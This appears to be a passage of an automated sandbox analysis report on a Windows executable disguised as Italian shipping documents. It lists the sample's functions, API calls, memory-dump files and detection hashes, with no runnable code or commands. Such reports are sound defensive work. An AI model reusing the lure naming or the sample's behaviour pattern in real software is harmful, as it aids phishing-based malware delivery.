APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
Opcode Fuzzy Hash: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D

Function 0040202F Relevance: 3.1, APIs: 2, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402045
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402064

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
String ID:
API String ID: 2520467145-0
Opcode ID: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
Instruction ID: 763ad8e8b63f2924b10e93d9a85bf0a11dc22f08f43b137c8aa05ca7cc66be5b
Opcode Fuzzy Hash: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
Instruction Fuzzy Hash: E7213871900208AFDB11DFE5C985EEEBBB4EF08354F11402AFA05B62D0D7759E51DB64

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C

Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
RegCloseKey.ADVAPI32(00000000), ref: 00402464

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
Instruction ID: 0b96b132e490ce7cd6ce1444893b6524bba18796501a832965f154b7c78b6e42
Opcode Fuzzy Hash: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
Instruction Fuzzy Hash: 82F06832A04510ABDB00BBA89A4D9EE62A5AF54314F11443FE502B71C1CAFC5D02966D

Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
GetLastError.KERNEL32 ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 0040604B
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Function 0040173A Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
Instruction ID: 361b5ea4dce5ff5b5c0a009366d47470cb0510696b1a56dfa9010847a1c89de2
Opcode Fuzzy Hash: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
Instruction Fuzzy Hash: 21E08071204104ABE700DB64DD49EAE77BCDF5036CF20553BE511E60D1E7B45905971D

Function 004063F2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674

Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4

Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4

Function 004063C4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,Exec,?,00000000), ref: 004063E8

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
